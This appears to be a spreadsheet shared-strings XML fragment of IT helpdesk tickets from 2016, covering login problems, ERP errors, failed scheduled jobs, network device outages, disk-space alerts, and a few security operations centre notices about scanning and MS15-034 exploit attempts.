    <t>kein zugriff von abteilung ce abstech eemw8144218 auf  datenbanken: betap_profil, betapdachform, betapfasen.  kontakt: sudghnthdra</t>
  </si>
  <si>
    <t>password changes</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: brhlcpqv.sfozwkyx@gmail.com_x000D_
_x000D_
hello,_x000D_
could you please help me on unlocking the erp? it is blocked for entering wrong password._x000D_
_x000D_
_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1148 failed in job_scheduler at: 08/22/2016 01:15:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1148 failed in job_scheduler at: 08/22/2016 01:15:00</t>
  </si>
  <si>
    <t>am not able to open any dash bankrd and hr_tool site through link web link</t>
  </si>
  <si>
    <t xml:space="preserve">am not able to open any dash bankrd and hr_tool site through link web link can you kindly check </t>
  </si>
  <si>
    <t>uwoqzmah jrzslmaf</t>
  </si>
  <si>
    <t>gdnshtzv lqrygnob</t>
  </si>
  <si>
    <t>unable to open permission protected mails</t>
  </si>
  <si>
    <t>kpm time sheet is not submitting. please resolve this issue as soon as possible.</t>
  </si>
  <si>
    <t>employee id-210667827</t>
  </si>
  <si>
    <t>kdfnaytr pudqfmtc</t>
  </si>
  <si>
    <t>erp miro cannot pose the two pos with error message like the attachment</t>
  </si>
  <si>
    <t xml:space="preserve">as the two attachment shown, when i pose this two po items, erp give the error message says the profit center is different. so i can't pose ir in miro now. please help settle them. </t>
  </si>
  <si>
    <t>can not do z_chk for t/o# 606627 with dn 8057978066</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: gjtyswkb.dpvaymxr@gmail.com_x000D_
_x000D_
dear it,_x000D_
_x000D_
we use z_chk want to confirm mm 4152195,but erp shows below error, pls help to check &amp; fix, </t>
  </si>
  <si>
    <t>password</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: rgtarthi.erjgypa@company.com_x000D_
_x000D_
hi help,_x000D_
_x000D_
i have changed the password today, except for the below._x000D_
please help me change for SID_39 too._x000D_
_x000D_
[cid:image001.png@01d1fc51.825a46c0]help_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>need to be able to create pr under xzn004 and xzs012.</t>
  </si>
  <si>
    <t>i used to be able to create pr for cost center xzn004 and xzs012, but now it does not worl. could you pls help to find out why? it shows "purchaising accross comapny is not allowed."</t>
  </si>
  <si>
    <t>engineering tool not working.</t>
  </si>
  <si>
    <t>my engineering tool shows a error message as "dataservices::taskmgr.getassignments() transaction (process id 413) was deadlocked on lock | communication buffer resources with another process and has been chosen as the deadlock victim. rerun the transaction"._x000D_
_x000D_
please help.</t>
  </si>
  <si>
    <t xml:space="preserve">windows password expired </t>
  </si>
  <si>
    <t>olevkypn vogiadqs</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_3028 failed in job_scheduler at: 08/21/2016 22:24:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_3028 failed in job_scheduler at: 08/21/2016 22:24:00</t>
  </si>
  <si>
    <t>apps</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: anpocezt.qturbxsg@gmail.com_x000D_
_x000D_
hello what apps should we be using on out phone. (iphone 6)_x000D_
skype or business skype.  collaboration_platform or business collaboration_platform and should back our phone on icloud, collaboration_platform or our computer._x000D_
_x000D_
best </t>
  </si>
  <si>
    <t xml:space="preserve">job Job_3028 failed in job_scheduler at: 08/21/2016 22:02:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_3028 failed in job_scheduler at: 08/21/2016 22:02:00</t>
  </si>
  <si>
    <t>tablet - dell 7350 - windows 8.1 ç³»ç»Ÿè¢«è¿˜åŽŸ. è´¦å·ä¸èƒ½ç™»å½•ç³»ç»Ÿã€‚</t>
  </si>
  <si>
    <t>please provide details of the issue._x000D_
 windows 8.1 ç³»ç»Ÿè¢«è¿˜åŽŸ. è´¦å·æ— æ³•ç™»å½•ç³»ç»Ÿã€‚</t>
  </si>
  <si>
    <t>ybjgecfx nxzuseac</t>
  </si>
  <si>
    <t>ess login issue.</t>
  </si>
  <si>
    <t>ess login issue_x000D_
-verified user details.(employee# &amp; manager name)_x000D_
-checked the user name in ad and reset the password.._x000D_
-advised the user to login and check._x000D_
-caller confirmed that he was able to login._x000D_
-issue resolved.</t>
  </si>
  <si>
    <t>pxfgoniv qhpkebgt</t>
  </si>
  <si>
    <t>vxlymbpz tysnumva</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_594 failed in job_scheduler at: 08/21/2016 17:13:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_594 failed in job_scheduler at: 08/21/2016 17:13:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1306 failed in job_scheduler at: 08/21/2016 15:40:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1306 failed in job_scheduler at: 08/21/2016 15:40:00</t>
  </si>
  <si>
    <t>usa:dnb-vpn-rtr(10.38.1.11) is down since 8:39 pm on 08/20 et</t>
  </si>
  <si>
    <t xml:space="preserve">usa: dnb-vpn-rtr(10.38.1.11) is down since 8:39 pm on 08/20 et.router went down during the sup engine replacement activity as per chg1144844._x000D_
</t>
  </si>
  <si>
    <t>gigabitethernet1/0/14 on company-eu-deu-ds-germany-edksw002-2960-stack-sw002.company.com  connected to ap company_de_germany_aSID_78</t>
  </si>
  <si>
    <t>gigabitethernet1/0/14 on company-eu-deu-ds-germany-edksw002-2960-stack-sw002.company.com  connected to ap company_de_germany_aSID_78  is flapping._x000D_
attached monitoring_engineering_tool.</t>
  </si>
  <si>
    <t>HostName_979(plm wwi uacyltoe hxgaycze):wwisvc.exe: wrong number of instances of process wwisvc.exe, expected instances gte 2 but found 0</t>
  </si>
  <si>
    <t xml:space="preserve">job snp_heu_5_regen failed in job_scheduler at: 08/21/2016 13:45:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job snp_heu_5_regen failed in job_scheduler at: 08/21/2016 13:45:00</t>
  </si>
  <si>
    <t xml:space="preserve">job bwhrattr failed in job_scheduler at: 08/21/2016 09:45:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job bwhrattr failed in job_scheduler at: 08/21/2016 09:45:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1314 failed in job_scheduler at: 08/21/2016 09:20:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1314 failed in job_scheduler at: 08/21/2016 09:20:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_511 failed in job_scheduler at: 08/21/2016 08:58:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_511 failed in job_scheduler at: 08/21/2016 08:58:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_511 failed in job_scheduler at: 08/21/2016 08:47:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_511 failed in job_scheduler at: 08/21/2016 08:47:00</t>
  </si>
  <si>
    <t>Israel, israel - (company):company-eu-isr--mainswitch-b-3560-access-sw02 is down since at 07:38 am et on 21-08-2016.</t>
  </si>
  <si>
    <t>EMEA, israel - (company):company-eu-isr--mainswitch-b-3560-access-sw02 is down since at 07:38 am et on 21-08-2016.</t>
  </si>
  <si>
    <t xml:space="preserve">job snp_heu_1_regen failed in job_scheduler at: 08/21/2016 06:36:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job snp_heu_1_regen failed in job_scheduler at: 08/21/2016 06:36:00</t>
  </si>
  <si>
    <t>india india kirty : interface: gigabitethernet2/0/48 on company-ap-ind-kirty-pu3-2960s-stack-sw01 is down.</t>
  </si>
  <si>
    <t>india india kirty : interface: gigabitethernet2/0/48 uplink to core 4503 admin switch on company-ap-ind-kirty-pu3-2960s-stack-sw01 is down</t>
  </si>
  <si>
    <t xml:space="preserve">job mm_zscr0099_wkly_rollfgyuej1 failed in job_scheduler at: 08/21/2016 00:11:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job mm_zscr0099_wkly_rollfgyuej1 failed in job_scheduler at: 08/21/2016 00:11:00</t>
  </si>
  <si>
    <t>no connection to t drive in na</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: blktuiae.jzakfmhw@gmail.com
dear it
is there any issue with the t drive in na
cannot get any connection
other drives in eu are running well
[cid:image001.png@01d1fb72.104f21c0]
gÃ¼nter webfnhtyer
manager  sourcing
blktuiae.jzakfmhw@gmail.com&lt;mailto:blktuiae.jzakfmhw@gmail.com&gt;
company shared services gmbh
geschÃ¤ftsfÃ¼hrer:  phvkowml azbtkqwx, naruedlk mpvhakdq</t>
  </si>
  <si>
    <t xml:space="preserve">weekly reboot of csqe prod servers </t>
  </si>
  <si>
    <t xml:space="preserve">weekly reboot of csqe prod servers _x000D_
_x000D_
HostName_1027_x000D_
HostName_1028_x000D_
</t>
  </si>
  <si>
    <t>HostName_768:chkdsk is still running after the monthy reboot</t>
  </si>
  <si>
    <t>after the monthly reboot of HostName_768 chkdsk is running from around 6:40 pm on 08/20 et._x000D_
currently chkdsk is verifying files (stage 1 of 3) with 9 percent complete.</t>
  </si>
  <si>
    <t>company-ap-chn-apac-company-psf-2960s-access-sw01.company.com (50.36.05.137 ) is down since 6:51 pm on 8/20 et</t>
  </si>
  <si>
    <t>ess login issue_x000D_
-verified user details.(employee# &amp; manager name)_x000D_
-checked the user name in ad and reset the password_x000D_
-advised the user to login and check._x000D_
-caller confirmed that she was able to login._x000D_
-issue resolved.</t>
  </si>
  <si>
    <t>qjfgkvln wzbngayp</t>
  </si>
  <si>
    <t>user unable to login to erp.</t>
  </si>
  <si>
    <t>HostName_30(sms &amp; sep server-company-india india):volume: g:\ label:wsp e26ca13a on server: HostName_30 is over 85% space co</t>
  </si>
  <si>
    <t xml:space="preserve">observing below alert in monitoring_tool since 3:52 pm on 08/20 et.monitoring_engineering_tool attached._x000D_
volume: g:\ label:wsp e26ca13a on server: HostName_30 is over 85% space consumed. space available: 4.2 g </t>
  </si>
  <si>
    <t>germany vrtx HostName_597 down / urgent</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ecwtrjnq.jpecxuty@gmail.com_x000D_
_x000D_
dear colleagues,_x000D_
_x000D_
all virtual servers in germany / germany are down after the move of HostName_597 / vrtx system._x000D_
_x000D_
we are urgently missing the virtual servers HostName_598 ( fileserver ) and efdsm009 ( printserver )_x000D_
_x000D_
server team, would you please be so kind and start the virtual servers on HostName_604 and HostName_605._x000D_
_x000D_
many </t>
  </si>
  <si>
    <t>mtd revenue detail report</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: qwijaspo.ukynmfig@gmail.com
dear it,
here is another report i view often and there have been changes made and they do not reflect my territory.  the report his missing several of my distributors and is off by $700,000 or so.
please see the screen shot.
[cid:image001.jpg@01d1fada.cc506390]
qwijaspo ukynmfig
sales manager - west coast
qwijaspo.ukynmfig@gmail.com&lt;mailto:qwijaspo.ukynmfig@gmail.com&gt;
</t>
  </si>
  <si>
    <t>vmax alert:a symmetrix power subsystem ac line interruption was detected.emc sr # 81364438</t>
  </si>
  <si>
    <t xml:space="preserve">observing these alerts since 5:37 am on 08/20 et_x000D_
_x000D_
severity : warning, category: environment, director : df-6d, numerirtc code: 0x001d, event code: ac_line_interrupted, description: a symmetrix power subsystem ac line interruption was detected_x000D_
severity : warning, category: environment, director : df-6b, numerirtc code: 0x001d, event code: ac_line_interrupted, description: a symmetrix power subsystem ac line interruption was detected_x000D_
severity : warning, category: environment, director : df-5c, numerirtc code: 0x001d, event code: ac_line_interrupted, description: a symmetrix power subsystem ac line interruption was detected_x000D_
severity : warning, category: environment, director : df-5a, numerirtc code: 0x001d, event code: ac_line_interrupted, description: a symmetrix power subsystem ac line interruption was detected_x000D_
</t>
  </si>
  <si>
    <t>user mentioned that the internet gets disconnected once she tries to open the ppt.(home location)</t>
  </si>
  <si>
    <t>user mentioned that the internet gets disconnected once she tries to open the ppt._x000D_
-had the user power cycle the pc and the modem ._x000D_
-user able to conenct to the inter._x000D_
-connected to the user system using teamviewer._x000D_
-tried to check the network settings, all fine._x000D_
-lost internet connection again.conection stays on for just 5 mins._x000D_
user mentioned that the connection at home is intermittent._x000D_
-conferenced the call with comcas isp._x000D_
-they disconnected the call, were not able to provide support to the user._x000D_
-user mentioned that she will try and connect from a local hotspot._x000D_
-user mentioned she will check the connection again later.</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_480 failed in job_scheduler at: 08/20/2016 13:36:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_480 failed in job_scheduler at: 08/20/2016 13:36:00</t>
  </si>
  <si>
    <t xml:space="preserve">space utilization :: e:\ label:dat1-ebhsm004 dc16126c85% space consumed. available: 4.7 g  since 8/20/2016 11:07 am est </t>
  </si>
  <si>
    <t xml:space="preserve">volume: e:\ label:dat1-ebhsm004 dc16126c on server: ebhsm004 is over _x000D_
85% space consumed. space available: 4.7 g </t>
  </si>
  <si>
    <t>HostName_1132:oracle finance_app financial management - web tier (epmsystem2) - service monitor(down)</t>
  </si>
  <si>
    <t>outlook problems. outlook doesn't start.</t>
  </si>
  <si>
    <t>name:uprmwlgb kirvecja
language:
browser:microsoft internet explorer
email:uprmwlgb.kirvecja@gmail.com
customer number:
telephone:
summary:outlook problems. outlook doesn't start.</t>
  </si>
  <si>
    <t>outlook not opening in laptop</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: vrjwyqtf.qoxkapfw@gmail.com_x000D_
_x000D_
hi,_x000D_
_x000D_
my outlook is not opening in my laptop. can you look into this urgently abd help???_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1314 failed in job_scheduler at: 08/20/2016 09:30:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1314 failed in job_scheduler at: 08/20/2016 09:30:00</t>
  </si>
  <si>
    <t>security incidents - (#in33655554) : errata security scanning activity</t>
  </si>
  <si>
    <t>=========================
incident overview
=========================
we are seeing your att-singapore-asa.company.com-1/54.96.80.216 device generating denied icmp trafficdenied icmp type=3, code=3 alerts alerts for traffic from port [no entry]/icmp of 209.126.230.71 to port [no entry]/icmp of your / device. these alerts are indicative of possible vulnerability scanning activity sourcing from the errata ip address 209.126.230.71.
errata has a page where you can request to be excluded from their scanning:
we are escalating this incident to you via a medium priority ticket and no phone call per our default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1) full escalation for errata vulnerability scanning activity (explicit notification via a high priority ticket and phone call)
2) automatically resolve errata vulnerability scanning activity to the portal (no explicit notification but events will be available for reporting purposes in the portal)
sincerely,
secureworks soc
=========================
technical details
=========================
vulnerabilities that may exist across your systems and applications can create a path for cyber attackers to gain access to and exploit your environment. these scans are used to identify and quantify specific security vulnerabilities in your environment, based on a database of known flaws. if sourcing from an unauthorized host, knowledge of your vulnerabilities could later be exploited to potentially interfere with service availability, execute code, or usa an attacker with unauthorized access.
=========================
references
=========================
=========================
event data
=========================
related events: 
event id: 91097767
event summary: denied icmp trafficdenied icmp type=3, code=3
occurrence count: 4
event count: 1
host and connection information
source ip: 209.126.230.71
source hostname: internetsurvey-2.erratasec.com.
source ip geolocation: atlanta, usa
connection directionality: incoming
protocol: icmp
device information
device ip: 54.96.80.216
device name: att-singapore-asa.company.com-1
log time: 2016-08-20 at 03:49:03 utc
action: blocked
cvss score: -1 
scwx event processing information
sherlock rule id (sle): 756571
inspector event id: 870599696
ontology id: 200020003203009212
event type id: 200020003203009112
agent id: 103955
event detail:
aug 20 03:49:03 54.96.80.216 %asa-3-313001: denied icmp type=3, code=3 from 209.126.230.71 on interface outside</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1392 failed in job_scheduler at: 08/20/2016 06:27:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1392 failed in job_scheduler at: 08/20/2016 06:27:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1995 failed in job_scheduler at: 08/20/2016 04:02:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1995 failed in job_scheduler at: 08/20/2016 04:02:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_2042 failed in job_scheduler at: 08/20/2016 04:02:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_2042 failed in job_scheduler at: 08/20/2016 04:02:00</t>
  </si>
  <si>
    <t>lean tracker error - repeated</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: rjanhbde.owfkyjcp@gmail.com_x000D_
_x000D_
hello_x000D_
_x000D_
pl. refer the below screen shot of error._x000D_
_x000D_
_x000D_
_x000D_
[cid:image003.jpg@01d1fad1.bfbfc520]_x000D_
_x000D_
_x000D_
warm </t>
  </si>
  <si>
    <t>owa installation in mobile device</t>
  </si>
  <si>
    <t>hi, i'm using personal android mobile phone and would like to use owa outlook on it but access denied/rejected. any one can help?</t>
  </si>
  <si>
    <t xml:space="preserve">abend batch job : Job_1315  </t>
  </si>
  <si>
    <t xml:space="preserve">job bwhrertran failed in job_scheduler at: 08/20/2016 00:38:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job bwhrertran failed in job_scheduler at: 08/20/2016 00:38:00</t>
  </si>
  <si>
    <t>interface: fastethernet0/27 Â· vlan 51: lhqwx402189sf on company-na-usa-usa-switch-cl04-3-2960-access-sw03.company.com is do</t>
  </si>
  <si>
    <t>extended monitor in the cube 3k-20(nvyjtmca xjhpznds) is not working.</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_3186 failed in job_scheduler at: 08/19/2016 20:00:50 edt  </t>
  </si>
  <si>
    <t>vbwszcqn nlbqsuyv</t>
  </si>
  <si>
    <t>ebhsm004:   volume: e:\ label:dat1-ebhsm004 dc16126c on server: ebhsm004 is over 85% space consumed</t>
  </si>
  <si>
    <t>ebhsm004:   volume: e:\ label:dat1-ebhsm004 dc16126c on server: ebhsm004 is over 85% space consumed. space available: 4.6 g</t>
  </si>
  <si>
    <t>monitoring_tool alerts &amp; activity page was not working in between 8:15 pm to 8:27 pm et on 08/19 et</t>
  </si>
  <si>
    <t>monitoring_tool alerts &amp; activity page was not working in between 8:15 pm to 8:27 pm et on 08/19 et. we logged off and logged in to monitoring_tool but the issues was still there.it was just showing as "loading" but nothing was displaying.when we click on my dashbankrd home button no issues it was working fine. only the issue observed with alerts &amp; activity page.</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_460 failed in job_scheduler at: 08/19/2016 18:23:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_460 failed in job_scheduler at: 08/19/2016 18:23:00</t>
  </si>
  <si>
    <t xml:space="preserve">unable to login to company engineering_tool </t>
  </si>
  <si>
    <t>ms crm app on desktop</t>
  </si>
  <si>
    <t>pytmhcxq cswovnax</t>
  </si>
  <si>
    <t>erp limited</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: liedzaft.lvnbzktj@gmail.com_x000D_
_x000D_
when i attempt to view sales data on erp the rows will not go beyond 65536. it was limited to that number with some filters still on. when i removed the filters to show more information it was still limited to 65536 rows. is there a fix to this?_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>liedzaft lvnbzktj</t>
  </si>
  <si>
    <t>problem with configurator</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: vkzwafuh.tcjnuswg@gmail.com
hi,
when i try to open the configurator from company center or engineering_tool i get this error. please advise.
[cid:image001.jpg@01d1fa31.0491caa0]
vkzwafuh tcjnuswg - cmp
sr. application eng.
vkzwafuh.tcjnuswg@gmail.com
</t>
  </si>
  <si>
    <t xml:space="preserve">china(apac): interface: gigabitethernet0/33 Â· mp-118 on company-ap-chn-china-2960g-access-sw05.company.com is down </t>
  </si>
  <si>
    <t>china(apac): interface: gigabitethernet0/33 Â· mp-118 on company-ap-chn-china-2960g-access-sw05.company.com is down since 02:13pm et on 08/19.</t>
  </si>
  <si>
    <t xml:space="preserve">collaboration_platform query </t>
  </si>
  <si>
    <t>access to engineering_tool</t>
  </si>
  <si>
    <t>job Job_1953d was running longer than 30 minutes kirtyled and rerun</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1953d failed in job_scheduler at: 08/19/2016 15:46:00</t>
  </si>
  <si>
    <t>47.95.91.3482 - unable to login</t>
  </si>
  <si>
    <t xml:space="preserve">unable to login to the switch 47.95.91.3482 - company-eu-deu-germany-vhsw02-2900-access-sw02 as the it is experiencing with the memory issue. </t>
  </si>
  <si>
    <t>call from external user</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: qfcxbpht.oiykfzlr@gmail.com
bokrgadu euobrlcn,
i think this is spam â€¦ fyi.
               hghtyther
from: drop 'box [mailto:pollauridamary1@live.com]
sent: friday, august 19, 2016 11:34 am
to: qfcxbpht oiykfzlr
subject: you have new pdf document (2) --shared via drop'box
[image removed by sender.]
dear qfcxbpht.oiykfzlr@gmail.com
     a dropbox user sent you some new document through dropbox.
  view! here&lt;
</t>
  </si>
  <si>
    <t>it issue</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: zwirhcol.narzlmfw@gmail.com_x000D_
_x000D_
hi we have a computer on the shop floor that will not boot up.  the power button has an orange flashing light.  the only thing i can tell you about the computer is the user name:cobrgtool_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">want to check the email if it is spam </t>
  </si>
  <si>
    <t xml:space="preserve">an intern has moved from the markhtyeting group to company. </t>
  </si>
  <si>
    <t>name:callie pollaurid
language:
browser:microsoft internet explorer
email:xzupryaf.vlbikhsm@gmail.com
customer number:
telephone:724
summary:quick question: an intern has moved from the markhtyeting group to company. who owns her computer and can she take it with her in her new position?</t>
  </si>
  <si>
    <t>re: ticket_no1530897 -- comments added</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: afkstcev.utbnkyop@gmail.com
i apologize â€“ when i updated the paramdntyeters earlier i failed to look if the right roles were added to the users â€“ they weren't.
i have now updated the 3 users to mktgen roles:
bc:alluser_crm
bc:basis_view
it:tcode_crm_ui
z:erp_crm_uiu_analtyicspro_ui
z:erp_crm_uiu_framdntyework
z:erp_crm_uiu_mkt_gen
z:erp_crm_uiu_sls_all
z:erp_crm_uiu_srv_gen
afkstcev utbnkyop
senior analyst, bokrgadu euobrlcn
afkstcev.utbnkyop@gmail.com&lt;mailto:afkstcev.utbnkyop@gmail.com&gt;
from: kathght shfhyw
sent: friday, august 19, 2016 2:21 pm
to: aoyrspjv hctgfeal &lt;aoyrspjv.hctgfeal@gmail.com&gt;
cc: company@ticketing_tool.com; eqxyvfpi gbaljypo &lt;eqxyvfpi.gbaljypo@gmail.com&gt;; riqmdnzs mtlghwex &lt;riqmdnzs.mtlghwex@gmail.com&gt;; gergryth mgndhtillen &lt;anxmvsor.fdjoawxq@gmail.com&gt;; kxvwsatr nmywsqrg &lt;kxvwsatr.nmywsqrg@gmail.com&gt;
subject: re: ticket_no1530897 -- comments added
send updated screenshot please.  if you are logging in from out of the office, please be sure that you are logged into vpn, then try accessing.
afkstcev utbnkyop
senior analyst, bokrgadu euobrlcn
afkstcev.utbnkyop@gmail.com&lt;mailto:afkstcev.utbnkyop@gmail.com&gt;
from: aoyrspjv hctgfeal
sent: friday, august 19, 2016 2:18 pm
to: kathght shfhyw &lt;afkstcev.utbnkyop@gmail.com&lt;mailto:afkstcev.utbnkyop@gmail.com&gt;&gt;
cc: company@ticketing_tool.com&lt;mailto:company@ticketing_tool.com&gt;; eqxyvfpi gbaljypo &lt;eqxyvfpi.gbaljypo@gmail.com&lt;mailto:eqxyvfpi.gbaljypo@gmail.com&gt;&gt;; riqmdnzs mtlghwex &lt;riqmdnzs.mtlghwex@gmail.com&lt;mailto:riqmdnzs.mtlghwex@gmail.com&gt;&gt;; gergryth mgndhtillen &lt;anxmvsor.fdjoawxq@gmail.com&lt;mailto:anxmvsor.fdjoawxq@gmail.com&gt;&gt;; aoyrspjv hctgfeal &lt;aoyrspjv.hctgfeal@gmail.com&lt;mailto:aoyrspjv.hctgfeal@gmail.com&gt;&gt;; kxvwsatr nmywsqrg &lt;kxvwsatr.nmywsqrg@gmail.com&lt;mailto:kxvwsatr.nmywsqrg@gmail.com&gt;&gt;
subject: fw: ticket_no1530897 -- comments added
hi khrtyujuine,
would you please help with this problem?
</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: afkstcev.utbnkyop@gmail.com
send updated screenshot please.  if you are logging in from out of the office, please be sure that you are logged into vpn, then try accessing.
afkstcev utbnkyop
senior analyst, bokrgadu euobrlcn
afkstcev.utbnkyop@gmail.com&lt;mailto:afkstcev.utbnkyop@gmail.com&gt;
from: aoyrspjv hctgfeal
sent: friday, august 19, 2016 2:18 pm
to: kathght shfhyw &lt;afkstcev.utbnkyop@gmail.com&gt;
cc: company@ticketing_tool.com; eqxyvfpi gbaljypo &lt;eqxyvfpi.gbaljypo@gmail.com&gt;; riqmdnzs mtlghwex &lt;riqmdnzs.mtlghwex@gmail.com&gt;; gergryth mgndhtillen &lt;anxmvsor.fdjoawxq@gmail.com&gt;; aoyrspjv hctgfeal &lt;aoyrspjv.hctgfeal@gmail.com&gt;; kxvwsatr nmywsqrg &lt;kxvwsatr.nmywsqrg@gmail.com&gt;
subject: fw: ticket_no1530897 -- comments added
hi khrtyujuine,
would you please help with this problem?
</t>
  </si>
  <si>
    <t>ticket update on this ticket_no0428491</t>
  </si>
  <si>
    <t xml:space="preserve">request for access to crm system </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ntuhoafg.bzwefjvk@gmail.com_x000D_
_x000D_
it team,_x000D_
_x000D_
please help to enable  access to crm system._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>distributor_tool entry</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: brhlcpqv.sfozwkyx@gmail.com_x000D_
_x000D_
hello,_x000D_
could you help me on entering distributor_tool company with my erp account?_x000D_
_x000D_
get outlook for ios&lt;_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>ulhpwzki awhjlbcp</t>
  </si>
  <si>
    <t>issue when updating vv32</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: rhwsmefo.tvphyura@gmail.com_x000D_
_x000D_
hello.  we are experiencing an issue when updating the following fields in vv32 ; partner and lang.  we have to update this field multiple times before it works in erp.  this is causing problems with customers receiving inwarehouse_tools so please markhty as high priority.  i had to update the record below at least 5 times before the partner and lang saved. </t>
  </si>
  <si>
    <t>vip 2 : pls usa access to russ hall to site referenced below</t>
  </si>
  <si>
    <t xml:space="preserve">vip 2 : pls usa access to russ hall to site referenced below_x000D_
_x000D_
the aero collaboration_platform can be found at:_x000D_
 _x000D_
_x000D_
 _x000D_
</t>
  </si>
  <si>
    <t>doxemspb utabejmq</t>
  </si>
  <si>
    <t>account lock out and password reset instructions</t>
  </si>
  <si>
    <t>ibcsejvn denhyvmr</t>
  </si>
  <si>
    <t>company email accounts tzrekwqf homwadbs!</t>
  </si>
  <si>
    <t xml:space="preserve">dear support team,_x000D_
_x000D_
can you give me an status about my issue?_x000D_
i must start me work on monday at the company site in fÃ¼rth._x000D_
further is my web access (office 365) not on going._x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>tzrekwqf homwadbs</t>
  </si>
  <si>
    <t>can't open outlook</t>
  </si>
  <si>
    <t xml:space="preserve">can't open outlook, same problem twice this week already </t>
  </si>
  <si>
    <t>collaboration_platform on phone does not sync</t>
  </si>
  <si>
    <t>update to office</t>
  </si>
  <si>
    <t>spam email queries</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1967c failed in job_scheduler at: 08/19/2016 11:21:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1967c failed in job_scheduler at: 08/19/2016 11:21:00</t>
  </si>
  <si>
    <t xml:space="preserve">'51551 vid67965 microsoft windows httpsys rce vulnerability exploit attempt (ms15-034 cve-2015-1635) </t>
  </si>
  <si>
    <t>dsw in33568767
incident overview
=========================
we are seeing '51551 vid67965 microsoft windows httpsys rce vulnerability exploit attempt (ms15-034 cve-2015-1635) - mapp' alerts being generated by your isensplant_247.company.com/208.211.136.207 device indicating that one or more hosts, including 198.8.80.219, are attempting to exploit the microsoft windows http.sys remote code execution vulnerability (cve-2015-1635/ms15-034) on one or more of your internet-facing hosts, including 208.211.136.164/208.211.136.164,. successful exploitation of this vulnerability may result in a denial of service condition or remote code execution on vulnerable systems. 
we are escalating this incident to you via a high severity/full escalation master ticket for all unblocked events related to this vulnerability (i.e. we are creating a singular ticket for all inbound threats related to this vulnerability). this ticket will effectively serve as a master ticket for any related events until we receive feedback from you on how to handle these events going forward. 
it should be noted that blocking each source ip address may not necessarily be productive due to attackers' ability to switch ip addresses through the use of proxies, anonymizing software such as tor, and vpns. please investigate your environment to determine whether you are running a vulnerable version of the application being targeted and ensure that you are running the most recent non-vulnerable version of windows, and that your devices are patched and properly hardened against attacks.
if you would like these events handled differently, please let us know either by corresponding to us via this ticket and delegating the ticket back to the soc, or by calling us at . we have a number of options available for the handling of future alerts such as this one:
